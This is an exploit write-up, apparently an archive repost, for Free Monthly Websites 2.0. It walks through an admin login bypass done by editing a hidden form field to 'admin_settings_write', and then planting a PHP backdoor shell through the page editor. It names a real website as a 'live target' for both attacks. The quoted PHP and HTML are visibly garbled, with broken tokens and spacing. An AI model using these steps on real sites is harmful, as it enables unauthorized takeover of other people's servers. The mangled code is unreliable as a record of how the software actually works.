Free Monthly Websites 2.0 multiple defects and repair

Title: Free Monthly Websites 2.0 Multiple Vulnerabilities
Author: X-Cisadane
Developer: http://www.freemonthlywebsites2.com/
: Http://www.freemonthlywebsites2.com/downloads/fmw_oto/websites/Free_Monthly_Websites_50_Custom_Websites_MPW7199.zip
Affected Versions: 2.0
Defect: Admin Login Bypass and Shell Upload Vulnerability
Test Platform: Google Chrome 24.0.1312.52 m (Windows xp sp 3 32-Bit English)
 
Test proof
======================
[1] Admin Login Bypass

Vulnerable page http://www.bkjia.com/[path]/admin/index. php
Line
40 <form name = "frm" action = "file_io.php" method = "post" onSubmit = "return chk ()">
41 <input type = "hidden" name = "do_type" value = "admin_settings_read">

Vulnerable page http://target.com/?path=/admin/login.php
Line
40 <form name = "frm" action = "file_io.php" method = "post" onSubmit = "return chk ()">
41 <input type = "hidden" name = "do_type" value = "admin_settings_read">

Vulnerable page http://target.com/?path=/admin/file_io.php
Line
14 if ($ _ REQUEST [do_type] = "admin_settings_read ")
15 {
16 $ filename = "settings/admin_settings.txt ";
17
18 if (! $ Handle = fopen ($ filename, 'R '))
19 {
20 echo "Cannot open file ($ filename )";
21 exit;
22}
23 $ contents = fread ($ handle, filesize ($ filename ));
24 fclose ($ handle );
25 $ argument_arr = explode ("# _ 1 _ #", $ contents );
26
27 if ($ argument_arr [0] === _ REQUEST [username] & $ argument_arr [1] === _ REQUEST [pass])
28 {
29 $ _ SESSION [logged_in] = true;
30 header ("location: welcome. php ");

Based at line 16 we know that Admin Username and Password store in admin_settings.txt NOT on Database!
So When we login into Admin Panel, file_io.php will Read Valid Username and Password from admin_settings.txt
If you do a direct access to the file admin_settings.txt, The results is

403 Permission Denied
You do not have permission for this request/admin/settings/admin_settings.txt
Pic: http://i48.tinypic.com/2gvlwt4.png


So... How to Bypass Admin Login Page?
1st. Open the Admin Login Page: http://target.com/?path=/admin/index.php
Live Target: http://www.massmoneywebsites.com/admin/

2nd. Inspect Element on the login Form.
Pic: http://i47.tinypic.com/2r5ddp1.png

3rd. Change from
<Form name = "frm" action = "file_io.php" method = "post" onsubmit = "return chk ()"> </form>
<Input type = "hidden" name = "do_type" value = "admin_settings_read">

CHANGE
<Form name = "frm" action = "file_io.php" method = "post" onsubmit = "return chk ()"> </form>
<Input type = "text" name = "do_type" value = "admin_settings_write">
Then press ENTER (please see pic ).
Pic: http://i49.tinypic.com/351z3ib.png

4th. You will see A Login Failed Page:> You need to login in to access that page <
Pic: http://i50.tinypic.com/33ws8jb.png
Never Mind About that, just click 'login click' and VOILA you get and Admin Access!
Pic: http://i45.tinypic.com/jzwpea.png
----------------------------------------
[2] Upload PHP Backdoor or PHP Shell

This vulnerability works on premium version of Free Monthly Websites 2.0

So... How to Upload Backdoor (PHP Shell )?

1st. Go to Add/Remove Navigation Page.
Http://target.com/?path=/admin/add_main_pages.php
Live Target: http://www.massmoneywebsites.com/admin/add_main_pages.php

2nd. Enter a Name For Your New Navigation Page That You Wish To Add: diffusion. php
And click Add New Navigation Page.
Pic: http://i45.tinypic.com/vigzsp.png

3rd. Still at the same page, scroll down the page until you see this section: Sort Your Page Buttons/Links.
Pic: http://i46.tinypic.com/1040oxg.png
Change FROM dwi.php.html TO/diffusion. php then Click Sort Navigation Pages.
Pic: http://i49.tinypic.com/24ec1l0.jpg

4th. Go to Edit Navigation Page.
Http://www.massmoneywebsites.com/admin/edit_main_pages.php
Please Select a Page To Edit: dwi.php.html <--- Select that page.

5th. Inspect element on dwi.php.html
Pic: http://i50.tinypic.com/29pq1ix.png
Change FROM <option value = "dwi.php.html" selected = ""> dwi.php.html </option>
To <option value = "diffusion. php" selected = ""> diffusion. php </option>
Pic: http://i47.tinypic.com/wtb0j6.png

6th. Enter A Page Title As You wowould Like It To Be Seen. Fill with diffusion. php
URL For This Page: main_pages/diffusion. php
Use the 'url For This page' field above: [Tick]
Display This Page in Left Vertical Site Navigation: [Tick]
Display This Page in Top Horizontal Site Navigation Buttons: [Tick]
Pic: http://i46.tinypic.com/1zebnle.png

7th. Still at the same page, scroll down the page until you see this section: Enter Content For Your Page:
Click SOURCE button
Press Enter Twice at the First Line then Paste your PHP Backdoor/PHP Shell below.
And Press Enter Twice at the Last Line.
* Please see 2 Pictures below If you dunno Understand: p
Pic 1: http://i49.tinypic.com/1zlzxq0.png
Pic 2: http://i48.tinypic.com/291kc9h.png

If you wanna do this, please Remove Your Backdoor Password.
Click Save Edited Navigation Page.

8th. After this message> Data saved successfully <Appeared, Visit the Home Page and you will see the Backdoor Page
Pic: http://i49.tinypic.com/4rt1g4.png

// I'm sorry My English was poor